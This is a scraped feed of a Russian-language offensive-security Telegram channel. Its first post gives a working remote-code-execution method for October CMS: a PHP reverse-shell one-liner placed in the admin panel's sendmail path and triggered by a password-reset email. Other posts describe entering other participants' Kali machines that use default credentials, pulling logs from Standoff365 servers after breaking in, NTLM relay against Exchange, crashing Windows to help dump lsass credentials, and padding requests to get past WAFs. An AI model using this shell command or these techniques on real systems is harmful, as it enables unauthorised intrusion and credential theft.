true_security – Telegram
true_security
2.24K subscribers
42 photos
4 videos
15 files
55 links
автор и владелец Zer0Way -@Nu11ed09
Download Telegram
Нолик от нолика (я cve не нашел и метод работает на стенде разработчика с последней версией - 3.5.0).
Уволился с работы, появилась неделя свободного времени.
Пошел ковырять стендофф365, смотрел сегодня таску с october cms. Попал в админку, посмотрел как ребята мучались с rce и нашел свой способ rce через админ панель.
В настройках отправки почты необходимо выбрать метод sendmail и в строку sendmail path дописать свой код для выполнения, например reverse shell:
php -r '$sock=fsockopen("ip",port);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'; /usr/sbin/sendmail -t -i
после сохранения настроек необходимо вызвать отправку письма, например восстановлением пароля по логину и команда будет выполнена. Привет reverse shell.
Разумеется, только в образовательных целях.
🔥16👍3
Интересное время, стали появляться крякнутые продукты позитива. pt nad, pt siem + vm. Это ли не признание продуктов?:)
👍11😁7
Не секрет что друзья не растут в огороде позитив собирает телеметрию на площадке standoff365. Если для "красных" ситуация более менее понятна, можно когда угодно приходить и тренить, за что собственно огромный респект pt. То с синими все печально, нет ни-че-го для развития скилов.
Что же делать простому работяге?)) Можно, например, прокачаться в социалку и инфру, получить доступ к серверам стендов... а потом завернуть логи к себе для дальнейшего сбора телеметрии.
PT собирает логи на лог коллекторы, что собственно не мешает нам забирать эти логи после получения доступа. Так же очень интересны, с точки зрения хантов, doc файлы которые отправляют при реализации атак методом соц. инженерии, логи веб-серверов и auditd с linuxов.
Вот так площадка standoff365 может быть полезна синим, и мозги размять при взломе и телеметрию собрать.

P.S. наврятли вы/мы/я найдем что то супер интересное в логах со standoff365, но для выработки насмотренности очень даже ничего.
👍5
true_security
первый релиз описанного выше модуля (целиком со всем проектом impacket): https://github.com/feedb/impacket_ews Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение. запуск: ntlmrelayx.py -smb2support -t htt…
Накопительное обновление 14 (CU14) Exchange Server 2019 устраняет эту уязвимость, активируя защиту ретрансляции учетных данных NTLM (также известную как расширенная защита для проверки подлинности или EPA).

Прощайте релеи на exchange =/.
Еще и уязвимостью это обозвали. жили столько лет а тут не тебе.
это еще и зиродей CVE-2024-21410 (CVSS: 9,8). 😂 что курят в майкрософт, этой теме 100 лет уже и разных тулз для эксплуатации было выпущено достаточно. Некоторые из этих тулз уже протухли и умерли.

по этим чертовым netntlmv2 можно брутить пароли пользователей, нужно срочно запретить пароли.
жду через 5 лет фиксов в утечках ntlm хэшей через html файлы, будет 000day🤨


ПС майки, там еще с сервером sharepoint беда)))
👍4
Что интересного можно найти на standoff365? Например, лог mikikatz с паролями хэшами какой то компании....который притащил с собой пентестер😜
😁22🔥2🥰1
Friendly fire на площадке stanfoff365.
Хакер, береги очко доступы с молоду.
На площадке открыт сетевой доступ между клиентами vpn, многие используют дистрибутив kali с дефолт кредами, а кто то еще и ssh стартует. Результат на скрине, получен доступ к kali хакера из Казахстана с ником ivashka из команды TSARKA.

Конечно же, с любовью и заботой о коллегах.
😁42👍2👎1
Вас 1к, спасибо. Кого обидел, простите:)
👍19👏1
Дополнение к предыдущему посту, zabbix agent умеет в ключ web.page.get, что собственно может быть использовано как ssrf и обход каких либо ограничений. И в принципе zabbix многое умеет делать с вебом, включая javanoscript
👍2
🌚 Threat Zone 2024
Мой любимый работодатель запилил исследование по угрозам
https://bi.zone/expertise/research/threat-zone-2024/
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰5👍21
Forwarded from RedTeam brazzers (Миша)
DC7499.pptx
5.2 MB
Способы получения учетных данных без взаимодействия с процессом lsass.exe

Продолжаю свой небольшой курс лекций, который я с радостью читаю в университете :) На этот раз решил подсветить и обратить внимание на варианты извлечения учётных данных без взаимодействия с процессом lsass.exe. Изначально презентация создавалась под субботнюю встречу DC7499, но записей оттуда пока что нет, поэтому я прочитал материал ещё раз, ведь тема действительно важная и может когда-нибудь спасти проект :)

С записью можно ознакомиться вот тут:
https://vk.com/video-210214143_456239063?list=07690309879b933b1b
👍2
Tomer_Bar_&_Shmuel_Cohen_EDR_Reloaded_Erase_Data_Remotely.pdf
5 MB
это не база, это базище😂
true_security
Иногда для lpe на винде при определённых условиях нужен перезапуск служб/ребут ос. Прав на это нет, но может помочь https://github.com/peewpw/Invoke-BSOD/blob/master/Invoke-BSOD.ps1 Бсодит винду без прав админа, не детектится антивирусами.
эту фичу можно использовать для получения кред из lsass в совокупности с описанными тут методами
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
🔥3😁2
Forwarded from Cracking | Reversing
VPN

Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как NordVPN или ExpressVPN.

https://ipapi.is/blog/systematic-vpn-detection.html

Большой список VPN exit NODE

Private: @CrackCloudRobot
Crypto Wares: @CryptoWares
Other projects: @MalwareLinks
👍9
У меня в подписчиках точно есть те кому нужен обновляемый список public vpn exit nodes в soc, забирайте.
🔥6
Так сказать, свой standoff
😁11🔥3
На этой неделе по некоторым телеграм каналам расходился инструмент EDRaser , судя по описанию: "EDRaser - это мощный инструмент для удаленного удаления журналов доступа, журналов событий Windows, баз данных и других файлов на удаленных компьютерах. Он предлагает два режима работы: автоматический и ручной."
По факту это
- флудер http запросов со сменой useragent
- флудер сообщений по syslog (хотя там гордо написано "Deletes syslog from Linux machines running Kaspersky EDR without being.")
- не понятно что делает с виндовыми логами, особо улыбнула строка: INVOKE_MIMIKATZ_STR = base64.b64decode("QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA==").decode() где в base64 засунули команду: "Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect" и полное отсутствие аутентификации.
ну и т.д.
Короче, очередной fake tools ) не тратьте на него свое время.
👍12😁3👎1
Forwarded from SHADOW:Group
This media is not supported in your browser
VIEW IN TELEGRAM
⌨️ Обход WAF через большое количество символов

Ранее я уже рассказывал о том, что для HTTP-запросов, содержащих тело запроса (например, POST, PUT, PATCH и т.д.), часто можно обойти WAF, просто добавив мусорные данные в начало запроса. Когда запрос дополняется этими ненужными данными, WAF обработает до X КБ запроса и проанализирует его, но все, что превышает пределы WAF, пройдет мимо.

На недавнем NahamCon вышел целый доклад на эту тему с подробным разбором и необходимыми значениями X КБ для обхода различных популярных WAF. Видео доклада, описание и расширение для вставки мусорных данных в Burp представлено по ссылкам ниже.

Ссылка на видео
Ссылка на GitHub

#web #waf #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥1